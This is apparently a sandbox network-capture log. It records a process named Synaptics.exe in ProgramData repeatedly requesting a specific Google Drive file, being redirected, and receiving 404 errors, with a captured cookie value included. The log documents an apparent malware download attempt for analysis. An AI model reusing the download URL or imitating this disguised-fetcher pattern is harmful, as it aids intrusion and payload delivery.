                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nirHLKwqxJuop_JKW-CfVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:02 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:02 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="LVDLh_hlyqC2thGJ0dOBvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:02 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    122 | 192.168.2.9 | 49910 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:02 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0C5nb2GxBJb3xIGzHz99fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    123 | 192.168.2.9 | 49911 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:03 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-KO229q-poEldv_Glk7u9QQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    124 | 192.168.2.9 | 49912 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:03 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4QxqiKOkZuS-UvkoUG3LrBF6IJSTDA_d9Dg18Kr_G9yeCRdvSQ_Ar5BfGXbGjJOVn8
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-gT_lwTRXHIZ-OxIsoXAMiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:03 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:03 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ZFcutSxMR_lf3aBdJRMVrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:03 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    125 | 192.168.2.9 | 49913 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:03 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-9jEbwLHbhitn7YfdSv8aYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    126 | 192.168.2.9 | 49914 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:03 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6AfcXctw8OgvHTp0-bdh0lww4MbiM-dLV7SO4RBu8-O1T-QgFuZMF0R-jpMaiPp78a
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e69MbAD3XGAf34Zo2TYf2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:03 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:03 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="wAbAHBtmdHfkZZOg_-Up1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:03 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    127 | 192.168.2.9 | 49916 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:04 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:04 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Ea8rJS7BmOWkCqSky_A4XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    128 | 192.168.2.9 | 49917 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:04 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:04 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7VWe34AD78lPHMwQg7A1Tp3wGgJ7RG__3hoWE_iAhMeqWH6cHmGLnI74VSUWJK_vjp
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xugerl6kd424cCCaLfYDtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:26:04 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:26:04 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="A1Zj_3JStgsRqs3JlqWXcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:26:04 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.9 | 49918 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:04 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:04 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5buCT6IpocGL-028MK_xsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.9 | 49919 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:04 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:04 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7L1mCsmc44ZvaSkVv1FsBpRw8pzGV1Zu7V6Feze5ZGhpV9Ah9zrUXpxuR4ZotRFgr0
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pLjXBePujxr5eJvcEacDFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:26:04 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:26:04 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="lWhE3OnbogUJKjmhtgkm0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:26:04 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
